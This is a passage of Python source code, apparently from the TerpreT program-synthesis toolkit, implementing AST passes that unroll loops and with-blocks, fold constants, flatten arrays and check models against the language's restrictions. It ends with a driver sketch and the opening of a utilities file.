for stmt in node.orelse:
new_stmt = self.visit(stmt)
if isinstance(new_stmt, list):
res.extend(new_stmt)
else:
res.append(new_stmt)
node.orelse = res
return node.orelse
return self.generic_visit(node)
def eval_const_expressions(node):
return PartialEvaluator().visit(node)
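# Sketch: constant subexpressions are folded in place, e.g.
#   tree = eval_const_expressions(ast.parse("x = 2 * 3 + 1"))
# leaves the assignment with the literal value 7 on its right-hand side.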
def subs(root, **kwargs):
    '''Substitute numbers (or other AST nodes) for ast.Name nodes in root
    using the mapping in kwargs. Returns a new copy of root.
'''
root = copy.deepcopy(root)
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Name(self, node):
if node.id in kwargs and not isinstance(node.ctx, ast.Store):
replacement = kwargs[node.id]
if isinstance(replacement, int):
return ast.copy_location(ast.Num(n=replacement), node)
else:
return copy.copy(replacement)
else:
return node
return Transformer().visit(root)
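# Sketch: substituting a concrete value for a name before unrolling, e.g.
#   tree = subs(ast.parse("y = N + 1"), N=4)
# replaces the load of 'N' with the literal 4, so eval_const_expressions can
# then fold the right-hand side down to 5.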
def update_variable_domains(variable_domains, node_list):
    '''Updates variable_domains by inserting mappings from a variable name to
    the number of elements in its data domain.
Program variables are created in assignments of the form
"{varName} = Var({size})" or "{varName} = Param({size})".
'''
for ch in node_list:
if isinstance(ch, ast.Assign) and len(ch.targets) == 1:
name = astunparse.unparse(ch.targets[0]).rstrip()
rhs = ch.value
if isinstance(rhs, ast.Call):
decl_name = rhs.func.id
args = rhs.args
elif isinstance(rhs, ast.Subscript) and isinstance(rhs.value, ast.Call):
decl_name = rhs.value.func.id
args = rhs.value.args
else:
continue
if decl_name not in ["Param", "Var", "Input", "Output"]:
continue
if len(args) > 1:
error.error('More than one size parameter in variable declaration of "%s".' % (name), ch)
size = args[0]
if isinstance(size, ast.Num):
if name in variable_domains and variable_domains[name] != size.n:
error.fatal_error("Trying to reset the domain of variable '%s' to '%i' (old value '%i')." % (name, size.n, variable_domains[name]), size)
variable_domains[name] = size.n
else:
error.fatal_error("Trying to declare variable '%s', but size parameters '%s' is not understood." % (name, astunparse.unparse(size).rstrip()), size)
def inline_assigns_and_unroll_fors_and_withs(root):
'''Substitute identifiers defined using ast.Assign nodes by their assigned values,
and unroll for/with statements at the same time.
These passes need to happen together, so that assignments that become constant through
unrolling are correctly propagated, and for/with statements are properly unrolled
when nested.
    Returns a new copy of root.
'''
variable_domains = {}
def get_variable_domain(node):
# Look up the number of values to switch on.
if isinstance(node, ast.Name):
return variable_domains[node.id]
if isinstance(node, str):
return variable_domains[node]
if isinstance(node, ast.Subscript):
if node.value.id in variable_domains:
return variable_domains[node.value.id]
node_name = astunparse.unparse(node).rstrip()
if node_name in variable_domains:
return variable_domains[node_name]
error.fatal_error("No variable domain known for expression '%s', for which we want to unroll a for/with." % (astunparse.unparse(node).rstrip()), node)
class Transformer(ast.NodeTransformer):
def __init__(self, environment={}, inlinable_functions={}):
# While I think Python's scoping rules are an abomination unto
# Nuggan, they do come handy here -- we don't need to worry
# about things coming in and going out of scope...
self.__environment = environment
self.__inlinable_functions = copy.copy(inlinable_functions)
def visit_FunctionDef(self, node):
for decorator in node.decorator_list:
self.visit(decorator)
# Record inlinable functions, and do not visit them:
if len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Inline":
self.__inlinable_functions[node.name] = node
else:
# Spawn off sub-visitor initialised with current environment,
# but its own scope, and remove arguments:
subEnvironment = copy.copy(self.__environment)
for arg in node.args.args:
subEnvironment.pop(arg.id, None)
subVisitor = Transformer(subEnvironment, self.__inlinable_functions)
node = subVisitor.generic_visit(node)
return node
def visit_Expr(self, node):
node = self.generic_visit(node)
if isinstance(node.value, list):
return node.value
else:
return node
def visit_Call(self, node):
if isinstance(node.func, ast.Name):
function_name = node.func.id
if function_name in self.__inlinable_functions:
to_inline = self.__inlinable_functions[function_name]
fun_pars = to_inline.args.args
call_args = node.args
if len(fun_pars) != len(call_args):
error.error("Trying to inline function with mismatching argument and parameter numbers.", node)
instantiation = {}
for i in range(0, len(fun_pars)):
instantiation[fun_pars[i].id] = self.visit(call_args[i])
inlined_stmts = []
for stmt in to_inline.body:
instantiated_stmt = subs(stmt, **instantiation)
instantiated_stmt = self.visit(instantiated_stmt)
inlined_stmts.append(instantiated_stmt)
return inlined_stmts
return self.generic_visit(node)
def visit_Assign(self, assgn):
if len(assgn.targets) > 1:
raise Exception("Cannot process tuple assignment in %s" % assgn)
if not(isinstance(assgn.targets[0], ast.Name)):
assgn.targets[0] = eval_const_expressions(self.visit(assgn.targets[0]))
else:
assgn.targets[0] = eval_const_expressions(assgn.targets[0])
target = assgn.targets[0]
assgn.value = eval_const_expressions(self.visit(assgn.value))
if isinstance(target, ast.Name) and (isinstance(assgn.value, ast.Num) or
isinstance(assgn.value, ast.Name) or
(isinstance(assgn.value, ast.Subscript) and isinstance(assgn.value.value, ast.Name))):
self.__environment[target.id] = assgn.value
update_variable_domains(variable_domains, [assgn])
return assgn
def visit_Name(self, node):
if node.id in self.__environment:
return copy.deepcopy(self.__environment[node.id])
else:
return node
def visit_If(self, node):
node.test = self.visit(node.test)
node = eval_const_expressions(node)
if not(isinstance(node, ast.If)):
if isinstance(node, list):
return flat_map(self.visit, node)
else:
return self.visit(node)
# We want to unroll the "else: P" bit into something explicit for
# all the cases that haven't been checked explicitly yet.
def get_or_cases(test):
if not(isinstance(test, ast.BoolOp) and isinstance(test.op, ast.Or)):
return [test]
else:
return itertools.chain.from_iterable(get_or_cases(value) for value in test.values)
def get_name_and_const_from_test(test):
if not(isinstance(test.ops[0], ast.Eq)):
raise Exception("Tests in if can only use ==, not '%s'." % (astunparse.unparse(test.ops[0]).rstrip()), node)
(name, const) = (None, None)
if (isinstance(test.left, ast.Name) or isinstance(test.left, ast.Subscript)) and isinstance(test.comparators[0], ast.Num):
(name, const) = (test.left, test.comparators[0].n)
elif (isinstance(test.comparators[0], ast.Name) or isinstance(test.comparators[0], ast.Subscript)) and isinstance(test.left, ast.Num):
(name, const) = (test.comparators[0], test.left.n)
return (name, const)
checked_values = set()
checked_vars = set()
# Now walk the .orelse branches, visiting each body independently. Expand ors on the way:
last_if = None
current_if = node
while True:
# Recurse with visitor first:
current_if.test = eval_const_expressions(self.visit(current_if.test))
current_if.body = flat_map(self.visit, current_if.body)
# Now, unfold ors:
test_cases = list(get_or_cases(current_if.test))
if len(test_cases) > 1:
else_body = current_if.orelse
new_if_node = None
for test_case in reversed(test_cases):
body_copy = copy.deepcopy(current_if.body)
new_if_node = ast.copy_location(ast.If(test=test_case,
body=body_copy,
orelse=else_body),
node)
else_body = [new_if_node]
current_if = new_if_node
# Make the change stick:
if last_if is None:
node = current_if
else:
last_if.orelse = [current_if]
# Do our deed:
try:
(checked_var, checked_value) = get_name_and_const_from_test(current_if.test)
checked_vars.add(checked_var)
checked_values.add(checked_value)
# Look at the next elif:
if len(current_if.orelse) == 1 and isinstance(current_if.orelse[0], ast.If):
last_if = current_if
current_if = current_if.orelse[0]
else:
break
except:
# This may happen if we couldn't cleanly identify the else case. For this, just leave things as they are:
return node
            # We need to stringify them, to not be confused by several instances referring to the same thing:
checked_var_strs = set(astunparse.unparse(var) for var in checked_vars)
if len(checked_var_strs) != 1:
raise Exception("If-else checking more than one variable (%s)." % (checked_var_strs))
checked_var = checked_vars.pop()
domain_to_check = set(range(get_variable_domain(checked_var)))
still_unchecked = domain_to_check - checked_values
else_body = flat_map(self.visit, current_if.orelse)
if len(else_body) == 0:
return node
# if len(still_unchecked) > 0:
# print("Else for values %s of %s:\n%s" % (still_unchecked, astunparse.unparse(checked_var).rstrip(), astunparse.unparse(else_body)))
for value in still_unchecked:
# print("Inserting case %s == %i in else unfolding." % (astunparse.unparse(checked_var).rstrip(), value))
var_node = copy.deepcopy(checked_var)
eq_node = ast.copy_location(ast.Eq(), node)
value_node = ast.copy_location(ast.Num(n=value), node)
test_node = ast.copy_location(ast.Compare(var_node, [eq_node], [value_node]), node)
case_body = copy.deepcopy(else_body)
new_if_node = ast.copy_location(ast.If(test=test_node, body=case_body, orelse=[]), node)
current_if.orelse = [new_if_node]
current_if = new_if_node
return node
def visit_For(self, node):
# Find start and end node of iteration range.
iter_args = [eval_const_expressions(self.visit(arg)) for arg in node.iter.args]
(i_start, i_end, i_step) = (0, None, 1)
def as_int(num):
check_type(num, ast.Num)
return num.n
if len(iter_args) == 1:
i_end = as_int(iter_args[0])
elif len(iter_args) == 2:
i_start = as_int(iter_args[0])
i_end = as_int(iter_args[1])
elif len(iter_args) == 3:
i_start = as_int(iter_args[0])
i_end = as_int(iter_args[1])
i_step = as_int(iter_args[2])
else:
raise RuntimeError("Unhandled number of args in for loop.")
body = []
for i in range(i_start, i_end, i_step):
# Perform loop unrolling in the cloned loop body. Note
# that we _must_ perform unrolling separately for each
# clone of the loop body, because inner loops may use
# the loop counter in their loop bounds. We will not
# be able to unroll these inner loops before we unroll
# this one.
# Substitute the value of the loop counter into the
# cloned loop body.
self.__environment[node.target.id] = ast.copy_location(ast.Num(n=i), node)
new_node = copy.deepcopy(node)
self.generic_visit(new_node)
update_variable_domains(variable_domains, new_node.body)
body += new_node.body
return body
def visit_With(self, node):
context_expr = self.visit(node.context_expr)
result = if_node = ast.copy_location(ast.If(), node)
variable_domain = get_variable_domain(context_expr)
for i_value in range(0, variable_domain):
# Create the test (context_expr == i_value).
eq_node = ast.copy_location(ast.Eq(), node)
value_node = ast.copy_location(ast.Num(n=i_value), node)
if_node.test = ast.copy_location(ast.Compare(context_expr, [eq_node], [value_node]), node)
# Substitute the current value of the context
# expression into the body of the with. If the with
# binds a name, substitute uses of that
# name. Otherwise, substitute uses of the context
# expression.
if node.optional_vars is not None:
check_type(node.optional_vars, ast.Name)
replacements = {node.optional_vars.id : i_value}
if_node.body = eval_const_expressions(subs(node, **replacements)).body
else:
if isinstance(context_expr, ast.Name):
replacements = {context_expr.id : i_value}
if_node.body = eval_const_expressions(subs(node, **replacements)).body
elif isinstance(context_expr, ast.Subscript):
replacements = {subscript_to_tuple(context_expr) : ast.copy_location(ast.Num(n=i_value), node)}
if_node.body = eval_const_expressions(sub_subscript(node, replacements)).body
else:
error.fatal_error('Unexpected expression in with.', context_expr)
update_variable_domains(variable_domains, if_node.body)
# Recursively process withs inside the body. This must
# be performed separately for each body, because withs
# inside the body may depend on the current value of
# the context expression.
self.generic_visit(if_node)
# If this is not the last iteration of the loop,
# generate a new if node and add it to the else block
# of the current if. We will use the new if node in
# the next iteration.
if i_value < variable_domain-1:
if_node.orelse = [ast.copy_location(ast.If(), node)]
if_node = if_node.orelse[0]
else:
if_node.orelse = []
if variable_domain == 0:
result = []
return result
root = copy.deepcopy(root)
return Transformer().visit(root)
def subscript_to_tuple(subscript):
'''Convert a subscripted name of the form Name[(i1, ..., in)] to a
tuple ('Name', i1, ..., in).
'''
def err():
raise ValueError('Unexpected kind of slice: {}'.format(astunparse.unparse(subscript)))
# Get subscript name.
if isinstance(subscript.value, ast.Name):
name = subscript.value.id
else:
err()
# Get indices.
if isinstance(subscript.slice, ast.Index):
if isinstance(subscript.slice.value, ast.Num):
indices = [subscript.slice.value]
elif isinstance(subscript.slice.value, ast.Tuple):
indices = subscript.slice.value.elts
else:
err()
else:
err()
# Convert indices to python numbers.
int_indices = []
for i in indices:
if isinstance(i, ast.Num):
int_indices.append(i.n)
else:
err()
return tuple([name] + int_indices)
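# Sketch:
#   subscript_to_tuple(ast.parse("A[(1, 2)]").body[0].value)  # => ('A', 1, 2)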
def sub_subscript(root, subs):
root = copy.deepcopy(root)
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Subscript(self, node):
self.generic_visit(node)
try:
node_tup = subscript_to_tuple(node)
if node_tup in subs:
return subs[node_tup]
else:
return node
except ValueError:
return node
return Transformer().visit(root)
def slice_node_to_tuple_of_numbers(slice_node):
if isinstance(slice_node.value, ast.Tuple):
indices = (elt for elt in slice_node.value.elts)
else:
indices = (slice_node.value,)
indices = list(indices)
for index in indices:
if not(isinstance(index, ast.Num)):
error.fatal_error("Trying to use non-constant value '%s' as array index." % (astunparse.unparse(index).rstrip()), index)
# Convert to python numbers
indices = (index.n for index in indices)
return indices
def flattened_array_name(array_name, indices):
return array_name + "_" + '_'.join([str(i) for i in indices])
def flatten_array_declarations(root):
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Assign(self, node):
if isinstance(node.value, ast.Subscript) and isinstance(node.value.value, ast.Call):
subscr = node.value
call = subscr.value
if len(node.targets) > 1:
error.error('Cannot use multiple assignment in array declaration.', node)
variable_name = node.targets[0].id
value_type = call.func.id
declaration_args = call.args
# Get the indices being accessed.
shape = slice_node_to_tuple_of_numbers(subscr.slice)
new_assigns = []
for indices in itertools.product(*[range(n) for n in shape]):
index_name = flattened_array_name(variable_name, indices)
new_index_name_node = ast.copy_location(ast.Name(index_name, ast.Store()), node)
new_value_type_node = ast.copy_location(ast.Name(value_type, ast.Load()), node)
new_declaration_args = [copy.deepcopy(arg) for arg in declaration_args]
new_call_node = ast.copy_location(ast.Call(new_value_type_node, new_declaration_args, [], None, None), node)
new_assign = ast.Assign([new_index_name_node], new_call_node)
new_assign = ast.copy_location(new_assign, node)
new_assigns.append(new_assign)
return new_assigns
else:
return node
return Transformer().visit(root)
def flatten_array_lookups(root):
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Subscript(self, node):
self.generic_visit(node)
# Get the indices being accessed.
indices = slice_node_to_tuple_of_numbers(node.slice)
variable_name = node.value.id
index_name = flattened_array_name(variable_name, indices)
return ast.copy_location(ast.Name(index_name, node.ctx), node)
return Transformer().visit(root)
def compute_function_outputs(root):
def cart_prod(xss):
if len(xss) == 0: return []
xs = xss[0]
if len(xss) == 1: return [[x] for x in xs]
rest_prod = cart_prod(xss[1:])
return [[ele] + pprod for ele in xs for pprod in rest_prod]
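    # Sketch: cart_prod([[0, 1], [0, 1]]) => [[0, 0], [0, 1], [1, 0], [1, 1]],
    # i.e. every argument tuple a @Runtime function must be evaluated on.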
#Extract all needed context statements:
defined_functions = {}
context_stmts = []
for node in root.body:
if isinstance(node, ast.Assign):
if isinstance(node.value, ast.Call) and node.value.func.id in ["Param", "Var", "Input", "Output"]:
pass
elif isinstance(node.value, ast.Name):
pass
else:
context_stmts.append(node)
if isinstance(node, ast.FunctionDef):
#Record the functions that we want to look at:
if len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Runtime":
decorator = node.decorator_list[0]
if len(decorator.args) == 2 and isinstance(decorator.args[0], ast.List) and all(isinstance(elt, ast.Num) for elt in decorator.args[0].elts) and isinstance(decorator.args[1], ast.Num):
defined_functions[node.name] = ([elt.n for elt in decorator.args[0].elts], decorator.args[1].n)
#We need to get rid of the annotation that we haven't defined...
node = copy.deepcopy(node)
node.decorator_list = []
context_stmts.append(node)
node = ast.Pass(lineno=0, col_offset=0)
#Evaluate each function on all allowed input/output pairs:
results = {}
for (func_name, (par_domains, res_domain)) in defined_functions.iteritems():
#Now prepare the code that we are going to evaluate:
func_name_node = ast.copy_location(ast.Name(id=func_name, ctx = ast.Load()), node)
stmts = []
args_to_var_name = {}
for args in cart_prod([range(d) for d in par_domains]):
arg_nodes = []
for arg in args:
arg_nodes.append(ast.copy_location(ast.Num(n=arg), node))
func_call = ast.copy_location(ast.Call(func_name_node, arg_nodes, [], None, None), node)
res_var_name = "res__%s__%s" % (func_name, "__".join(map(str, args)))
args_to_var_name[tuple(args)] = res_var_name
res_var_name_node = ast.copy_location(ast.Name(id=res_var_name, ctx=ast.Store()), node)
stmts.append(ast.copy_location(ast.Assign([res_var_name_node], func_call), node))
wrapped = ast.copy_location(ast.Module(body=context_stmts + stmts), node)
eval_globals = {}
eval(compile(wrapped, '<constructed>', 'exec'), eval_globals)
results[func_name] = {args: eval_globals[args_to_var_name[args]] for args in args_to_var_name.keys()}
return results
def check(root):
    '''Checks unrolled program for correctness w.r.t. TerpreT restrictions.
    These include SSA form (i.e., no code path sets the same value twice),
    variable initialisation (all values are initialised or an input), and
    domain checks (assigned values fit the declared range of the variable).
    '''
class CheckMessage(object):
def __init__(self, message, node = None):
self.message = message
self.node = node
def message_prefix(self):
return ""
def print(self):
if self.node != None and hasattr(self.node, "lineno"):
if hasattr(self.node, "col_offset"):
location_description = "In line %i, col %i: " % (self.node.lineno, self.node.col_offset)
else:
location_description = "In line %i: " % (self.node.lineno)
else:
location_description = ""
eprint("%s%s%s" % (self.message_prefix(), location_description, self.message))
class CheckError(CheckMessage):
def __init__(self, message, node = None):
super(CheckError, self).__init__(message, node)
def message_prefix(self):
return "Error: "
class CheckWarning(CheckMessage):
def __init__(self, message, node = None):
super(CheckWarning, self).__init__(message, node)
def message_prefix(self):
return "Warning: "
#Sadly, this can't implement ast.NodeVisitor, because we need more state (and control over that state)
#The implementation is a copy of the ast.NodeVisitor interface, extended to thread a state object through the recursion.
#In our case, this is a pair of the set of initialized variables and the set of used variables, whose updated form we return.
class TerpretChecker():
def __init__(self):
self.__var_domain = {} # name -> uint, where "foo" => 3 means 'foo can take values 0, 1, 2'; 0 means "variable is numeric constant"
self.__defined_functions = {}
self.__messages = []
self.__outputs = []
def __set_domain(self, node, var, dom):
if var in self.__var_domain:
self.__messages.append(CheckError("Trying to redeclare variable '%s'." % (var), node))
self.__var_domain[var] = dom
def __get_domain(self, node, var):
if not(var in self.__var_domain):
self.__messages.append(CheckError("Trying to use undeclared variable '%s'." % (var), node))
return 0
return self.__var_domain[var]
def __is_declared(self, var):
return var in self.__var_domain
def __get_domain_of_expr(self, node):
if isinstance(node, ast.Name):
return self.__get_domain(node, node.id)
elif isinstance(node, ast.Call):
(_, value_domain) = self.__defined_functions[node.func.id]
return value_domain
elif isinstance(node, ast.Num):
return node.n + 1 #And now all together: Zero-based counting is haaaaard.
else:
self.__messages.append(CheckError("Cannot determine domain of value '%s' used in assignment." % (astunparse.unparse(node).rstrip()), node))
return 0
def check_function_outputs(self):
functions_to_ins_to_outs = compute_function_outputs(root)
for (func_name, (par_domains, res_domain)) in self.__defined_functions.iteritems():
ins_to_outs = functions_to_ins_to_outs[func_name]
for args, output in ins_to_outs.iteritems():
if output < 0 or output >= res_domain:
self.__messages.append(CheckError("Function '%s' with domain [0..%i] returns out-of-bounds value '%i' for inputs %s." % (func_name, res_domain - 1, output, str(args)), root))
def visit(self, state, node):
"""Visit a node or a list of nodes."""
if isinstance(node, list):
node_list = node
else:
node_list = [node]
for node in node_list:
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
state = visitor(state, node)
return state
def visit_FunctionDef(self, state, node):
if len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Runtime":
decorator = node.decorator_list[0]
if len(decorator.args) == 2 and isinstance(decorator.args[0], ast.List) and all(isinstance(elt, ast.Num) for elt in decorator.args[0].elts) and isinstance(decorator.args[1], ast.Num):
if node.name in self.__defined_functions:
self.__messages.append(CheckError("Re-definition of @Runtime function '%s'." % (node.name), node))
self.__defined_functions[node.name] = ([elt.n for elt in decorator.args[0].elts], decorator.args[1].n)
else:
self.__messages.append(CheckError("@Runtime function '%s' has unknown parameter structure, should be ([NUM, ..., NUM], NUM)." % (node.name), node))
elif len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Inline":
pass #These are OK.
else:
self.__messages.append(CheckError("Cannot declare non-@Runtime function '%s'." % (node.name), node))
return state
def visit_Assign(self, state, assgn):
(parameters, initialised, used) = state
if len(assgn.targets) > 1:
self.__messages.append(CheckError("Cannot process tuple assignment in '%s'." % (astunparse.unparse(assgn).rstrip()), assgn))
target = assgn.targets[0]
value = assgn.value
if isinstance(target, ast.Name):
assignedVar = target.id
if isinstance(value, ast.Num):
if self.__is_declared(assignedVar):
self.__messages.append(CheckError("Trying to assign num literal '%i' to model variable '%s'." % (value.n, assignedVar), assgn))
elif isinstance(value, ast.Call) and isinstance(value.func, ast.Name):
if (value.func.id in ["Var", "Param", "Input", "Output"]):
if isinstance(value.args[0], ast.Num):
self.__set_domain(assgn, assignedVar, value.args[0].n)
else:
self.__messages.append(CheckError("Cannot declare variable/parameter with non-constant range '%s'." % (astunparse.unparse(value.func.args[0]).rstrip()), assgn))
if value.func.id == "Param":
return (parameters | {assignedVar}, initialised, used)
if value.func.id == "Input":
return (parameters, initialised | {assignedVar}, used)
if value.func.id in ["Output"]:
self.__outputs.append(assignedVar)
return (parameters, initialised, used | {assignedVar})
elif value.func.id in self.__defined_functions:
for argument in value.args:
(_, _, used) = self.visit((parameters, initialised, used), argument)
return (parameters, initialised | {assignedVar}, used)
else:
self.__messages.append(CheckError("Cannot assign unknown function to variable '%s'." % (assignedVar), assgn))
else:
if self.__is_declared(assignedVar):
self.__messages.append(CheckError("Trying to assign '%s' to model variable '%s'." % (astunparse.unparse(value).rstrip(), assignedVar), assgn))
else:
self.__messages.append(CheckError("Cannot assign value to non-variable '%s'." % (astunparse.unparse(target).rstrip()), assgn))
return state
def visit_Expr(self, state, expr):
return self.visit(state, expr.value)
def visit_Name(self, state, name):
(parameters, initialised, used) = state
if name.id not in initialised and name.id not in parameters:
self.__messages.append(CheckError("Use of potentially uninitialised variable '%s'." % (name.id), name))
return (parameters, initialised, used | {name.id})
def visit_Num(self, state, name):
return state
def visit_Call(self, state, call):
(parameters, initialised, used) = state
if isinstance(call.func, ast.Attribute):
func = call.func
func_name = func.attr
set_variable = func.value.id
if func_name in ["set_to_constant", "set_to"]:
#Check that the children are fine:
if len(call.args) != 1:
self.__messages.append(CheckError("'%s.%s' with more than one argument unsupported." % (set_variable, func_name), call))
value = call.args[0]
(_, _, val_used_vars) = self.visit(state, value)
if set_variable in initialised:
self.__messages.append(CheckError("Trying to reset value of variable '%s'." % (set_variable), call))
if set_variable in parameters:
self.__messages.append(CheckWarning("Setting value of parameter '%s'." % (set_variable), call))
domain = self.__get_domain(call, set_variable)
if isinstance(value, ast.Num) and (value.n < 0 or value.n >= domain):
self.__messages.append(CheckError("Trying to set variable '%s' (domain [0..%i]) to invalid value '%i'." % (set_variable, domain - 1, value.n), call))
else:
value_domain = self.__get_domain_of_expr(value)
if value_domain != domain:
if isinstance(value, ast.Num) and (value.n >= domain or value.n < 0):
self.__messages.append(CheckError("Trying to set variable '%s' (domain [0..%i]) to value '%s'." % (set_variable, domain - 1, astunparse.unparse(value).rstrip()), value))
elif not(isinstance(value, ast.Num)):
self.__messages.append(CheckError("Trying to set variable '%s' (domain [0..%i]) to value '%s' with different domain [0..%i]." % (set_variable, domain - 1, astunparse.unparse(value).rstrip(), value_domain - 1), value))
return (parameters, initialised | {set_variable}, val_used_vars)
elif func_name in ["set_as_input"]:
return (parameters, initialised | {set_variable}, used)
elif func_name in ["set_as_output"]:
return (parameters, initialised, used | {set_variable})
elif func_name == "observe_value":
#Check that the children are fine:
if len(call.args) != 1:
self.__messages.append(CheckError("'%s.%s' with more than one argument unsupported." % (set_variable, func_name), call))
(_, _, val_used_vars) = self.visit(state, call.args[0])
if set_variable not in initialised:
self.__messages.append(CheckError("Observation of potentially uninitialised variable '%s'." % (set_variable), call))
return (parameters, initialised, val_used_vars | {set_variable})
else:
self.__messages.append(CheckError("Unsupported call '%s'." % (astunparse.unparse(call).rstrip()), call))
else:
func_name = call.func.id
func_information = self.__defined_functions.get(func_name, None)
if func_information != None:
(par_domains, _) = func_information
used_vars = used
if len(call.args) != len(par_domains):
self.__messages.append(CheckError("Call to %i-ary function '%s' with %i arguments." % (len(par_domains), func_name, len(call.args)), call))
for idx in range(len(call.args)):
arg = call.args[idx]
(_, _, used_vars) = self.visit((parameters, initialised, used_vars), arg)
par_domain = par_domains[idx]
arg_domain = self.__get_domain_of_expr(arg)
if arg_domain != par_domain:
if isinstance(arg, ast.Num) and (arg.n >= par_domain or arg.n < 0):
self.__messages.append(CheckError("Parameter %i of function '%s' has domain [0..%i], but argument value '%s' is incompatible." % (idx + 1, func_name, par_domain - 1, astunparse.unparse(arg).rstrip()), arg))
elif not(isinstance(arg, ast.Num)):
self.__messages.append(CheckError("Parameter %i of function '%s' has domain [0..%i], but argument value '%s' has different domain [0..%i]." % (idx + 1, func_name, par_domain - 1, astunparse.unparse(arg).rstrip(), arg_domain - 1), arg))
return (parameters, initialised, used_vars)
else:
self.__messages.append(CheckError("Call to undefined functions '%s'." % (func_name), call))
def visit_If(self, state, node):
(parameters, initialised, used) = state
#Here we need to do a bit of work to "linearise" case-analysis if-elif-elif structures,
#to explore if all cases are covered (and to see if the else branch is ever hit)
#For this, we have a fairly restrictive test format:
def check_test(test):
if not(isinstance(test.ops[0], ast.Eq)):
self.__messages.append(CheckError("Tests can only use ==, not '%s'." % (astunparse.unparse(test.ops[0]).rstrip()), node))
if not(isinstance(test.left, ast.Name)):
self.__messages.append(CheckError("Tests have to have identifier, not '%s' as left operand." % (astunparse.unparse(test.left).rstrip()), node))
if len(test.comparators) != 1:
self.__messages.append(CheckError("Tests cannot have multiple comparators in test '%s'." % (astunparse.unparse(test).rstrip()), node))
if not(isinstance(test.comparators[0], ast.Num)):
self.__messages.append(CheckError("Tests have to have constant, not '%s' as right operand." % (astunparse.unparse(test.comparators[0]).rstrip()), node))
return (test.left.id, test.comparators[0].n)
(checked_var, checked_val) = check_test(node.test)
if checked_var not in initialised and checked_var not in parameters:
self.__messages.append(CheckError("Test uses potentially uninitialised variable '%s'." % (checked_var), node))
var_domain_to_check = set(range(0, self.__get_domain(node, checked_var)))
used.add(checked_var)
#Now walk the .orelse branches, visiting each body independently...
branch_inits = []
current_if = node
while True:
(branch_checked_var, branch_checked_val) = check_test(current_if.test)
if branch_checked_var != checked_var:
self.__messages.append(CheckError("Case-analysis branch tests refer to different variables '%s' and '%s'." % (checked_var, branch_checked_var), current_if))
if branch_checked_val not in var_domain_to_check:
self.__messages.append(CheckError("Testing for value '%i' of variable '%s', which is either out of domain or has already been handled." % (branch_checked_val, checked_var), current_if))
var_domain_to_check.discard(branch_checked_val)
(_, branch_init, used) = self.visit((parameters, initialised.copy(), used), current_if.body)
branch_inits.append(branch_init)
if len(current_if.orelse) == 0:
#We've reached the end:
break
elif len(current_if.orelse) > 1 or not(isinstance(current_if.orelse[0], ast.If)):
self.__messages.append(CheckError("Non-empty else branch of case analysis.", node))
break
else:
current_if = current_if.orelse[0]
#... and now check if the results make sense:
some_branches_init = branch_inits[0].copy()
all_branches_init = branch_inits[0].copy()
#If not all values were checked, the empty else block wouldn't do anything:
if len(var_domain_to_check) > 0:
all_branches_init = initialised.copy()
for i in range(1, len(branch_inits)):
some_branches_init = some_branches_init.union(branch_inits[i])
all_branches_init = all_branches_init.intersection(branch_inits[i])
not_all_inits = some_branches_init.difference(all_branches_init)
if len(not_all_inits) > 0:
self.__messages.append(CheckWarning("Variables '%s' only initialised in some branches of if-elif." % ("', '".join(sorted(not_all_inits))), node.lineno))
return (parameters, all_branches_init, used)
def visit_Module(self, state, node):
return self.visit(state, node.body)
        def visit_ImportFrom(self, state, imp):
            if imp.module == "dummy":
                return state
            return self.generic_visit(state, imp)
def generic_visit(self, state, node):
self.__messages.append(CheckError("AST node '%s' unsupported." % (astunparse.unparse(node).strip()), node))
def check(self, root):
try:
(parameters, initialised, used) = self.visit((set(), set(), set()), root)
unused = initialised - used
for id in self.__outputs:
if id not in initialised:
self.__messages.append(CheckError("Output variable '%s' not initialised." % (id)))
for id in unused:
self.__messages.append(CheckWarning("Variable '%s' initialised, but not used." % (id)))
self.check_function_outputs()
except Exception as e:
#Ignore if we found something
if any([message for message in self.__messages if isinstance(message, CheckError)]):
pass
else:
raise
if len(self.__messages) > 0:
for message in self.__messages:
message.print()
return False
return True
return TerpretChecker().check(root)
def count_nodes(node):
i = 0
for _ in ast.walk(node):
i += 1
return i
def print_increase(node_count, start_node_count, prev_node_count=None):
inc_start = float(node_count - start_node_count) / start_node_count
if prev_node_count:
inc_prev = float(node_count - prev_node_count) / prev_node_count
eprint('Code size increased {:.2f}x over initial, {:.2f}x over previous.'.format(inc_start, inc_prev))
else:
eprint('Code size increased {:.2f}x over initial.'.format(inc_start))
def unroll_and_flatten(root, do_checks=True, print_info=False):
count_start = count_nodes(root)
if print_info: eprint('Inlining assignments and unrolling for loops and with statements...', end='')
root = inline_assigns_and_unroll_fors_and_withs(root)
if print_info: eprint('done.')
count_unrolled = count_nodes(root)
if print_info: print_increase(count_unrolled, count_start, count_start)
if print_info: eprint('Partial evaluation of constant model components...', end='')
root = eval_const_expressions(root)
if print_info: eprint('done.')
count_branches = count_nodes(root)
if print_info: print_increase(count_branches, count_start, count_unrolled)
if print_info: eprint('Flattening declarations...', end='')
root = flatten_array_declarations(root)
if print_info: eprint('done.')
count_decls = count_nodes(root)
if print_info: print_increase(count_decls, count_start, count_branches)
if print_info: eprint('Flattening lookups...', end='')
root = flatten_array_lookups(root)
if print_info: eprint('done.')
count_lookups = count_nodes(root)
if print_info: print_increase(count_lookups, count_start, count_decls)
if do_checks:
check(root)
return root
```
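A minimal driver sketch for the unrolling pipeline above. This is illustrative, not part of the source: the model path is an assumption, while `unroll_and_flatten` and `check` are the functions defined in this file.
```python
import ast
import astunparse

# Hypothetical entry point: parse a TerpreT model, unroll/flatten it,
# run the restriction checks, and print the transformed program.
with open('models/turing.py', 'r') as f:  # path is an assumption
    root = ast.parse(f.read())

root = unroll_and_flatten(root, do_checks=True, print_info=True)
print(astunparse.unparse(root))
```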
#### File: TerpreT/lib/utils.py
```python
import ast
import json
import pdb
import os
from astunparse import unparse
def cast(node, node_type):
assert isinstance(node, node_type), "cast to %s failed %s" % (node_type, ast.dump(node))
return node
def get_index(subscript_node):
index_node = cast(subscript_node.slice, ast.Index)
return name_or_number(index_node.value)
def is_int_constant(name_node):
